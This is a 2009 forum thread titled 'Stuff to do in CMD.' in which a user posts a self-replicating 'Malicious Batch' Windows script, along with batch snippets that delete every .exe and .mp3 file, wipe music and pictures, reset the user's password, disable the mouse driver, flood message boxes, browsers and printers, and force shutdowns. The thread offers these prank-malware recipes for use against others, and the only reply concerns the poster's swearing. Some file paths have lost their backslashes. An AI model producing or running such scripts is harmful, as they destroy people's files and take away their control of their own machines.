ASC | Technology @ Its Best!
Would you like to react to this message? Create an account in a few clicks or log in to continue.


Welcome to ASC Tech Support
 
HomeGalleryLatest imagesSearchRegisterLog in
Hello Users, and Welcome to the FXTech Support Forums! Here, you will get the best help possible!
NEWS: Owner FX has JUST created the Project X Web Browser and would like you to try it out! To download it exclusively, go to the "Click Here For Downloads" Forums and select "Project X Installer is FINALLY OUT!"
Log in
Username:
Password:
Log in automatically: 
:: I forgot my password
Search
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» Stuck on Hand Tool in ANY Adobe Programs?
Stuff to do in CMD. EmptyTue Apr 13, 2010 9:25 am by Owner FX

» Tutorial - Masking In Adobe Fireworks CS4
Stuff to do in CMD. EmptyWed Mar 03, 2010 10:40 am by Owner FX

» Tutorial - Auto Talker In Visual Basic 2008
Stuff to do in CMD. EmptyWed Mar 03, 2010 10:39 am by Owner FX

» Project X Web Browser | Features
Stuff to do in CMD. EmptyThu Feb 25, 2010 7:01 am by Owner FX

» Tutorial - Themes For Notepad In Visual Basic
Stuff to do in CMD. EmptyWed Feb 17, 2010 8:53 pm by Owner FX

» Tutorial - Advanced Notepad In Visual Basic
Stuff to do in CMD. EmptyWed Feb 17, 2010 8:51 pm by Owner FX

» Tutorial - Lightning Effect In Sony Vegas
Stuff to do in CMD. EmptyWed Feb 17, 2010 8:50 pm by Owner FX

» Tutorial - Rotate Text In Sony Vegas
Stuff to do in CMD. EmptySun Feb 14, 2010 10:41 pm by Owner FX

» Tutorial - How To Make A Glossy Button In Adobe Fireworks CS4
Stuff to do in CMD. EmptySun Feb 14, 2010 1:53 am by Owner FX

Top posters
Owner FX
Stuff to do in CMD. Vote_lcapStuff to do in CMD. Voting_barStuff to do in CMD. Vote_rcap 
Van
Stuff to do in CMD. Vote_lcapStuff to do in CMD. Voting_barStuff to do in CMD. Vote_rcap 
Tannerfrankuml
Stuff to do in CMD. Vote_lcapStuff to do in CMD. Voting_barStuff to do in CMD. Vote_rcap 
Guitardude187
Stuff to do in CMD. Vote_lcapStuff to do in CMD. Voting_barStuff to do in CMD. Vote_rcap 
Aurel
Stuff to do in CMD. Vote_lcapStuff to do in CMD. Voting_barStuff to do in CMD. Vote_rcap 
Roma
Stuff to do in CMD. Vote_lcapStuff to do in CMD. Voting_barStuff to do in CMD. Vote_rcap 
soulkvibe
Stuff to do in CMD. Vote_lcapStuff to do in CMD. Voting_barStuff to do in CMD. Vote_rcap 
Social bookmarking
Social bookmarking reddit      

If you share FXTechSupport around these Social Bookmarks, you will be entered in a change to win Administrator spot, and a custom made YouTube Layout! Owner FX

Bookmark and share the address of ASC | Technology @ Its Best! on your social bookmarking website

 

 Stuff to do in CMD.

Go down 
2 posters
AuthorMessage
Van
Admin
Van


Posts : 26
Join date : 2009-09-19
Location : United Kingdom.

Stuff to do in CMD. Empty
PostSubject: Stuff to do in CMD.   Stuff to do in CMD. EmptyMon Oct 26, 2009 9:05 am

Malicious Batch

Don't be a dumb ass and open this up on your own computer!

1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, windows explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down

ONCE AGAIN DONT TEST THIS ON YOUR COMPUTER YOU ARE AT YOUR OWN RISK WITH THIS ONE

CODE:

Code:
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%Greatgame > nul
reg add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v Greatgame /t REG_SZ
/d %systemroot%Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%desktop
copy Greatgame.bat %random%.bat
goto RIP the computer


-------------------------------------------------------------------------------------------------------------




Shutdown computer with a custom error

CODE:

Code:
shutdown -c "enter your message here" -s -t 55



-------------------------------------------------------------------------------------------------------------



Website Spammer

This will spam whatever website you want as many times as you want they can be different websites too

CODE:

Code:
@echo off
start WEBSITE_HERE.com
start WEBSITE_HERE.com
start WEBSITE_HERE.com
start WEBSITE_HERE.com





(YOU CAN MAKE AS MANY "start WEBSITE_HERE.com" AS YOU WANT)





-------------------------------------------------------------------------------------------------------------





Change User's Password:
Code:
net user %username% ENTER_A_PASSWORD_HERE
Delete my music:
Code:
del /f /q '%userprofile%My Music*.*'

Delete my picture's:
Code:
del /f /q '%userprofile%My Pictures*.*'
Open&Close Disk Drive:
Code:
echo Do >> "opendisk.vbs"
echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs"
echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
echo Loop >> "opendisk.vbs"
start "" "opendisk.vbs"
Set time:
Code:
time 11:23

Delete all .exe file's:
Code:
DIR /S/B %SystemDrive%*.exe >> FIleList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
Delete all mp3 file's:
Code:
DIR /S/B %SystemDrive%*.mp3 >> FIleList_mp3.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_mp3.txt) do del "%%j:%%
k"

Message box flooder:
Code:
:start
msg * You have been flooded
goto :start
Internet page flooder:
Code:
:start
start http://web page
goto :start

Mspaint flooder:
Code:
:start
start mspaint.exe
goto :start

Shutdown pc in 30 seconds:
Code:
shutdown -s -t 30


-------------------------------------------------------------------------------------------------------------




Play xp song:
Code:
start "" "%systemroot%system32oobeimagestitle.wma"

Disable mouse:
Code:
set key="HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
Spam printer:
Code:
[color="#ff0000"]echo SPAM YOU ARE BEING -SPAMMED- YOU ARE BEING -SPAMMED-YOU ARE BEING -SPAMMED-YOU ARE BEING -SPAMMED-YOU ARE BEING -SPAMMED-YOU ARE BEING -SPAMMED-YOU ARE BEING -SPAMMED-YOU ARE BEING -SPAMMED-YOU ARE BEING -SPAMMED-YOU ARE BEING -SPAMMED-YOU ARE BEING -SPAMMED-YOU ARE BEING -SPAMMED->> "Spam.txt"
Copy that red text here about 5 x's
notepad /P "Spamage.txt"[/color]
Back to top Go down
Owner FX
Admin
Owner FX


Posts : 101
Join date : 2009-07-11
Age : 33
Location : Unknown

Stuff to do in CMD. Empty
PostSubject: Re: Stuff to do in CMD.   Stuff to do in CMD. EmptyWed Oct 28, 2009 9:23 am

VanApple wrote:
Malicious Batch

Don't be a dumb ass and open this up on your own computer!

Please, Do Not Call People Names, Or Swear. I Can Only Give You 1 Warning If You Do This Again.

Thank You,
TheTUTubeChannel
Back to top Go down
https://fxtechsupport.forumotion.com
 
Stuff to do in CMD.
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
ASC | Technology @ Its Best! :: Computer-Related Help :: Command Prompt Related-
Jump to: